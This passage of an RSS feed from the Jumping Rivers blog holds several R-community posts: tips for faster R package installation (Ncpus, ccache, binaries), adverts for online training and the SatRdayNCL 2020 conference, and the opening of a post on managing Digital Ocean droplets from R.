&lt;p&gt;The bigger picture is that package installation time is starting to become more of an issue for a number of reasons. For example, packages are getting larger and more complex (tidyverse and friends), so installation just takes longer. Or we are using more continuous integration strategies such as &lt;a href="http://travis-ci.org/" rel="external"&gt;Travis&lt;/a&gt; or &lt;a href="https://docs.gitlab.com/ee/ci/" rel="external"&gt;GitLab-CI&lt;/a&gt;, and want quick feedback. Or we are simply updating a large number of packages via &lt;code&gt;update.packages()&lt;/code&gt;. This is a problem we often solve for our clients - optimising their CI/CD pipelines.&lt;/p&gt;
&lt;p&gt;The purpose of this blog post is to pull together a few different methods for tackling this problem. If I’ve missed any, let me know (&lt;a href="https://twitter.com/csgillespie" rel="external"&gt;&lt;/a&gt;&lt;a href="https://twitter.com/csgillespie" rel="external"&gt;https://twitter.com/csgillespie&lt;/a&gt;)!&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2020-faster-r-package-installation-rstudio"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="faster-installation-with-ncpus"&gt;Faster installation with Ncpus&lt;/h2&gt;
&lt;p&gt;The first tactic you should use is the &lt;code&gt;Ncpus&lt;/code&gt; argument in &lt;code&gt;install.packages()&lt;/code&gt; and &lt;code&gt;update.packages()&lt;/code&gt;. This installs packages in parallel. It doesn’t speed up an individual package installs, but it does allow dependencies to install in parallel, e.g. tidyverse. Using it is easy; it’s just an additional argument in &lt;code&gt;install.packages()&lt;/code&gt;. So to use six cores, we would simply use&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tidyverse&amp;#34;&lt;/span&gt;, Ncpus &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;When installing a fresh version of the tidyverse and all dependencies, this can give a two-fold speed-up.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Ncpus&lt;/th&gt;
&lt;th&gt;Elapsed (Secs)&lt;/th&gt;
&lt;th&gt;Ratio&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;409&lt;/td&gt;
&lt;td&gt;2.26&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;224&lt;/td&gt;
&lt;td&gt;1.24&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;196&lt;/td&gt;
&lt;td&gt;1.08&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;181&lt;/td&gt;
&lt;td&gt;1.00&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;Not bad for a simple tweak with no downsides. For further information, see our &lt;a href="https://www.jumpingrivers.com/blog/speeding-up-package-installation/" rel="external"&gt;blog post&lt;/a&gt; from a few years ago.&lt;/p&gt;
&lt;p&gt;In short, this is something you should definitely use and add to your &lt;code&gt;.Rprofile&lt;/code&gt;. It would in theory speed-up continuous integration pipelines, but only if you have multiple cores available. The free version of travis only comes with a single core, but if you hook up a multi-core Kubernettes cluster to your CI (we sometimes do this at &lt;a href="https://www.jumpingrivers.com" rel="external"&gt;Jumping Rivers&lt;/a&gt;), then you can achieve a large speed-up.&lt;/p&gt;
&lt;h2 id="faster-installation-with-ccache"&gt;Faster installation with ccache&lt;/h2&gt;
&lt;p&gt;If you are installing packages from source, i.e. tar.gz files, then most of the installation time is spent on compiling source code, such as C, C++ &amp;amp; Fortran. A few years ago, Dirk Eddelbuettel wrote a great &lt;a href="http://dirk.eddelbuettel.com/blog/2017/11/27/" rel="external"&gt;blog post&lt;/a&gt; on leveraging the &lt;a href="https://ccache.samba.org/" rel="external"&gt;ccache&lt;/a&gt; utility for reducing the compile time step. Essentially, ccache stores the resulting object file created when compiling. If that file is ever compiled again, instead of rebuilding, ccache returns the object code, resulting in a significant speed up. It’s the classic trade-off between memory (caching) and CPU.&lt;/p&gt;
&lt;p&gt;Dirk’s &lt;a href="http://dirk.eddelbuettel.com/blog/2017/11/27/" rel="external"&gt;post&lt;/a&gt; gives clear details on how to implement ccache (so I won’t repeat). He also compares re-installation times of packages, with RQuantlib going from 500 seconds to a few seconds. However, for ccache to be effective, the source files have to be static. Obviously, when you update an R package things change!&lt;/p&gt;
&lt;p&gt;As an experiment, I download the last seventeen versions of {dplyr} from &lt;a href="https://cran.r-project.org/web/packages/dplyr/" rel="external"&gt;CRAN&lt;/a&gt;. This takes us back to version 0.5.0 from 2016. Next I installed each version in turn, via&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Avoid tidyverse packages, as we are messing about with dplyr&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;f &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list.files&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;data&amp;#34;&lt;/span&gt;, full.names &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;elapsed &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;numeric&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;length&lt;/span&gt;(f))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; (i &lt;span style="color:#ff7b72"&gt;in&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;seq_along&lt;/span&gt;(f)) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; elapsed[i] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;system.time&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(f[i], repos &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt;))[&lt;span style="color:#a5d6ff"&gt;&amp;#34;elapsed&amp;#34;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;As all packages dependencies have been installed and the source code has already been downloaded, the above code times the installing of just {dplyr}. If we then implement &lt;strong&gt;ccache&lt;/strong&gt;, we can easily rerun the above code. After a little manipulation we can plot the absolute installation times&lt;/p&gt;
&lt;img class="image-center" src="timings.png" style="width:550px; class:image-center"&gt;
&lt;p&gt;The first (slightly obvious) takeaway is that there is no speed-up with {dplyr} v0.5.0. This is simply because ccache relies on previous installations. As v0.5.0 is the first version in our study, there is no difference between standard and ccache installations.&lt;/p&gt;
&lt;p&gt;Over the seventeen versions of dplyr, we achieved a 24 fold speed-up for three versions, and more modest two to four fold speed-up for a further three versions. Averaged over all seventeen version, a typical speed-up is around 50%.&lt;/p&gt;
&lt;p&gt;Overall, using ccache is a very effective and easy strategy. It requires a single, simple set-up, and doesn’t require root access. Of course it doesn’t always work, but it never really slows anything down.&lt;/p&gt;
&lt;p&gt;At the start of this section, I mentioned the trade off between memory and CPU. I’ve been using ccache since 2017, and the current cache size is around 6GB. Which on a modern hard drive isn’t much (and I install a lot of packages)!&lt;/p&gt;
&lt;h2 id="using-ubuntu-binaries"&gt;Using Ubuntu Binaries&lt;/h2&gt;
&lt;p&gt;On Linux, the standard way of installing packages is via source and &lt;code&gt;install.packages()&lt;/code&gt;. However, it is also possible to install packages using binary packages. This has two main benefits&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;It’s faster - typically a few seconds&lt;/li&gt;
&lt;li&gt;It (usually) solves any horrible dependency problems by installing the necessary dev-libraries.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you are using continuous integration, such as GitLab runners, then this is a straightforward step to reduce the package installation time. The key idea is to add an additional binary source to your source.lists file, see for example, the line in &lt;a href="https://github.com/rocker-org/rocker/blob/master/r-ubuntu/Dockerfile#L27" rel="external"&gt;rocker&lt;/a&gt;. After that, you can install most CRAN packages via&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo apt install r-cran-dplyr
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The one big downside here is that the user requires root access to install an R package, so this solution isn’t suitable in all situations.&lt;/p&gt;
&lt;p&gt;There’s lots of documentation available, &lt;a href="https://cran.r-project.org/bin/linux/ubuntu/" rel="external"&gt;CRAN&lt;/a&gt; and &lt;a href="http://dirk.eddelbuettel.com/blog/2017/12/13/" rel="external"&gt;blog posts&lt;/a&gt;, so I won’t bother repeating by adding more.&lt;/p&gt;
&lt;h2 id="using-rstudio-package-manager"&gt;Using RStudio Package Manager&lt;/h2&gt;
&lt;p&gt;The RStudio &lt;a href="https://rstudio.com/products/package-manager/" rel="external"&gt;Package Manager&lt;/a&gt; is one of RStudio’s Pro products that is used to ultimately pay for their open source work, e.g. the RStudio desktop IDE and all of their tidyverse R packages.&lt;/p&gt;
&lt;p&gt;CRAN mirrors have for a long time distributed binary packages for Windows and Mac. The RSPM provides precompiled binaries for CRAN packages for&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Ubuntu 16.04 (Xenial), Ubuntu 18.04 (Bionic)&lt;/li&gt;
&lt;li&gt;CentOS/RHEL 7, CentOS/RHEL 8&lt;/li&gt;
&lt;li&gt;openSUSE 42/SLES 12, openSUSE 15/SLES 15&lt;/li&gt;
&lt;li&gt;Windows (soon, currently in beta)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The big advantage of RSPM over the Ubuntu binaries solution above, is that root access is no longer necessary. Users can just install via the usual &lt;code&gt;install.packages()&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/faster-r-package-installation-rstudio/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Online R, Python &amp; Git Training!</title><link>https://www.jumpingrivers.com/blog/online-r-python-git-training/</link><pubDate>Mon, 16 Mar 2020 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/online-r-python-git-training/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/online-r-python-git-training/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/online-r-python-git-training/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Hey there!&lt;/p&gt;
&lt;p&gt;Here at Jumping Rivers, we have the capabilities to teach you R, Python &amp;amp; Git &lt;strong&gt;&lt;em&gt;virtually&lt;/em&gt;&lt;/strong&gt;. For the last three years we have been running online training courses for small groups (and even 1 to 1).&lt;/p&gt;
&lt;h3 id="how-is-it-different-to-an-in-person-course"&gt;How is it different to an in-person course?&lt;/h3&gt;
&lt;p&gt;It&amp;rsquo;s the same, but also different! The course contents is the same, but obviously the structure is adapted to online training. For example, rather than a single long session, we would break the day up over a couple of days and allow regular check-in points.&lt;/p&gt;
&lt;p&gt;For the courses, we use &lt;a href="https://whereby.com" rel="external"&gt;whereby.com&lt;/a&gt;. This provides screen-sharing for both instructor and attendees, none of the interactivity is lost.&lt;/p&gt;
&lt;h3 id="what-about-it-restrictions"&gt;What about IT restrictions?&lt;/h3&gt;
&lt;p&gt;Don&amp;rsquo;t worry! If your current IT security/infrastructure is a problem, we have two solutions:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Training can be done using cloud services. We can provide a secure RStudio server or Jupyter notebook environment just for &lt;strong&gt;your&lt;/strong&gt; team. This means attendees simply have to log on to our cloud service to be able to use the appropriate software and packages.&lt;/li&gt;
&lt;li&gt;We have a fleet of state of the art Chromebooks, available to post to attendees. Each Chromebook comes with all required software and packages pre-installed. A microphone headset can also be provided if necessary.&lt;/li&gt;
&lt;/ol&gt;
&lt;h3 id="what-is-the-classroom-size"&gt;What is the classroom size?&lt;/h3&gt;
&lt;p&gt;We have a maximum online classroom size of 12, including the instructor. Attendees will get the opportunity for a follow-up &amp;ldquo;virtual coding clinic&amp;rdquo;, split into smaller class sizes, in order to enquire about anything related to the course or how they can apply it to their work.&lt;/p&gt;
&lt;p&gt;If you would like to enquire about virtual training, either email &lt;a href="mailto:hello@jumpingrivers.com" rel="external"&gt;hello@jumpingrivers.com&lt;/a&gt; or contact us &lt;a href="https://www.jumpingrivers.com/contact/" rel="external"&gt;via our website&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/online-r-python-git-training/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>#SatRdayNCL is back - don't miss out</title><link>https://www.jumpingrivers.com/blog/satrdayncl-is-back-dont-miss-out/</link><pubDate>Wed, 04 Mar 2020 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/satrdayncl-is-back-dont-miss-out/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/satrdayncl-is-back-dont-miss-out/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/satrdayncl-is-back-dont-miss-out/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;We are very pleased to announce, as you might already be aware, that SatRday is coming back to Newcastle upon Tyne on 4th April 2020. SatRdays are one-day, non-profit, community organised R conferences held across the world.&lt;/p&gt;
&lt;h2 id="where-will-it-be-held"&gt;Where will it be held?&lt;/h2&gt;
&lt;p&gt;The event will be held at &lt;a href="https://g.page/The-Catalyst-Newcastle?share" rel="external"&gt;The Catalyst&lt;/a&gt; - right next to St James’ Park. There are vast transport facilities available to you, meaning Newcastle is very easy to get to - there are no excuses for you not to come!&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Train: 90 minutes from Edinburgh or 3 hours from London. The train station is in the middle of Newcastle.&lt;/li&gt;
&lt;li&gt;Plane: Direct flights from Schiphol, Paris, Stansted, Heathrow, Dublin, Belfast. The airport is only 15 minutes from the city centre by taxi.&lt;/li&gt;
&lt;/ul&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2020-satrdayncl-is-back-dont-miss-out"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="when-will-it-be-held"&gt;When will it be held?&lt;/h2&gt;
&lt;p&gt;The main conference will be held on Saturday April 4th, with a pre-conference tutorial day held in the afternoon of the 3rd. The timings are as follows:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Tutorials: Friday 3rd April 13:00 - 16:30&lt;/li&gt;
&lt;li&gt;Main conference: Saturday 4th April 9:30 - 16:30&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The full schedule can be found on the &lt;a href="https://newcastle2020.satrdays.org/" rel="external"&gt;#SatRdayNCL website&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="what-are-the-tutorials-on"&gt;What are the tutorials on?&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Julia Silge will be running a tutorial on Sentiment Analysis&lt;/li&gt;
&lt;li&gt;Jumping Rivers will be running a tutorial on “How to build an R package”&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Tickets to the tutorials are £50 and can be &lt;a href="https://webstore.ncl.ac.uk/conferences-and-events/faculty-of-science-agriculture-engineering/mathematics-statistics-and-physics/satrdays-tutorial" rel="external"&gt;bought online&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="who-will-be-speaking"&gt;Who will be speaking?&lt;/h2&gt;
&lt;p&gt;We&amp;rsquo;ve got a fantastic line up of speakers for you this year. You can find out more about our speakers and their talks on the &lt;a href="https://newcastle2020.satrdays.org/" rel="external"&gt;#SatRdayNCL website&lt;/a&gt;.&lt;/p&gt;
&lt;h3 id="keynote-speakers"&gt;Keynote speakers&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Mine Çetinkaya-Rundel - Senior Lecturer at University of Edinburgh / Educator at RStudio&lt;/li&gt;
&lt;li&gt;Julia Silge - Data Scientist at RStudio&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="additional-speakers"&gt;Additional speakers&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Theo Roe - one of our very own Data Scientists at Jumping Rivers&lt;/li&gt;
&lt;li&gt;Stepan Sindelar - Developer at Oracle Labs&lt;/li&gt;
&lt;li&gt;Kenneth McLean - Clinical Research Fellow at University of Edinburgh&lt;/li&gt;
&lt;li&gt;Russ Hyde - Bioinformatician at University of Glasgow&lt;/li&gt;
&lt;li&gt;Emma Vestesson - Senior Data Analyts at the Health Foundation &amp;amp; PhD student at UCL Institute of Child Health&lt;/li&gt;
&lt;li&gt;Pablo De Juan Bernabeu - PhD student at Lancaster University&lt;/li&gt;
&lt;li&gt;Chris Mainey - Senior Statistical Intelligence Analyst at University Hospitals Birmingham NHS Foundation Trust&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="how-much-is-the-event"&gt;How much is the event?&lt;/h2&gt;
&lt;p&gt;Early bird tickets have unfortunately sold out, however, the next set of tickets for £45 (25% off) are currently for sale. If you aren’t lucky enough to be one of the first 80 to get a ticket, the full price will be £60. Be quick - when they are gone, they really are gone! &lt;a href="https://webstore.ncl.ac.uk/conferences-and-events/faculty-of-science-agriculture-engineering/mathematics-statistics-and-physics/satrday-2020" rel="external"&gt;Buy tickets online&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Submissions to speak have unfortunately closed - but hey, you get to sit back and listen to some of the most talented individuals in the R community.&lt;/p&gt;
&lt;p&gt;If you want any more information, don’t hesitate to view the &lt;a href="https://newcastle2020.satrdays.org/" rel="external"&gt;#SatRdayNCL website&lt;/a&gt; or e-mail &lt;a href="mailto:hello@jumpingrivers.com" rel="external"&gt;hello@jumpingrivers.com&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Cheers and I hope you can make it!&lt;/p&gt;
&lt;p&gt;&lt;a href="https://unsplash.com/@askkell?utm_medium=referral&amp;utm_campaign=photographer-credit&amp;utm_content=creditBadge" rel="external" title="Download free do whatever you want high-resolution photos from Andy Kelly"&gt;unsplash-logoImage by Andy Kelly&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/satrdayncl-is-back-dont-miss-out/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>R as a tool for Systems Administration</title><link>https://www.jumpingrivers.com/blog/r-as-a-tool-for-systems-administration/</link><pubDate>Mon, 27 Jan 2020 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-as-a-tool-for-systems-administration/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-as-a-tool-for-systems-administration/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-as-a-tool-for-systems-administration/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;When talking about languages to use in Production in data science, R is usually not part of the conversation and if it is, it&amp;rsquo;s referenced as a secondary language. One of the main reasons this occurs is because R it’s commonly associated with being more suitable for statistical analysis and languages like Python and JavaScript, more suitable for doing other tasks such as creating web applications or implementing machine learning models. However, one realm where R’s capabilities haven’t been explored to the maximum is Systems Administration.&lt;/p&gt;
&lt;p&gt;At Jumping Rivers we make use of R as our main tool for doing tasks related to Systems Administration. The main way in which we implement our solutions is by dividing one package per service and then developing the specific functions to manage it. One of these packages that we have developed is named {jrDroplet}.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2020-r-as-a-tool-for-systems-administration"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="jrdroplet"&gt;{jrDroplet}&lt;/h2&gt;
&lt;p&gt;{jrDroplet} is a package designed specifically to manage Virtual Machines in Digital Ocean for our training courses. The idea is that with a single line we are able to create a Digital Ocean droplet with the packages installed for our courses, hiding all of the background complexities related to infrastructure. Below is an overview of our &lt;code&gt;create_droplet()&lt;/code&gt; function, reduced slightly for simplicity:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;create_droplet &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(client_name,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; droplet_name,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; vm_size,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ssh_keys,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; image_base,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; region,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sub_domain,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dns_root)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; image &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_latest_training_snapshot&lt;/span&gt;(region &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; region,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; base &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; image_base)[[1]]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;message&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Using image &amp;#34;&lt;/span&gt;, image&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;name))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; analogsea&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;droplet_create&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; droplet_name,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; region &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; region,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ssh_keys &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ssh_keys,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; vm_size,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; image &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; image&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;id)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; droplets &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; analogsea&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;droplets&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;message&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#39;Waiting for IP address to be assigned to VM&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ip_address &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; droplets[[droplet_name]]&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;networks&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;v4[[1]]&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;ip_address
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dr &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; analogsea&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;domain_record_create&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; domain &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; dns_root,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;A&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; sub_domain,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ip_address
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This function takes a set of given arguments and proceeds to do a number of steps that would be required to be done manually in the Digital Ocean interface. I will explain below what is happening in the code and what would be the equivalent in the interface.&lt;/p&gt;
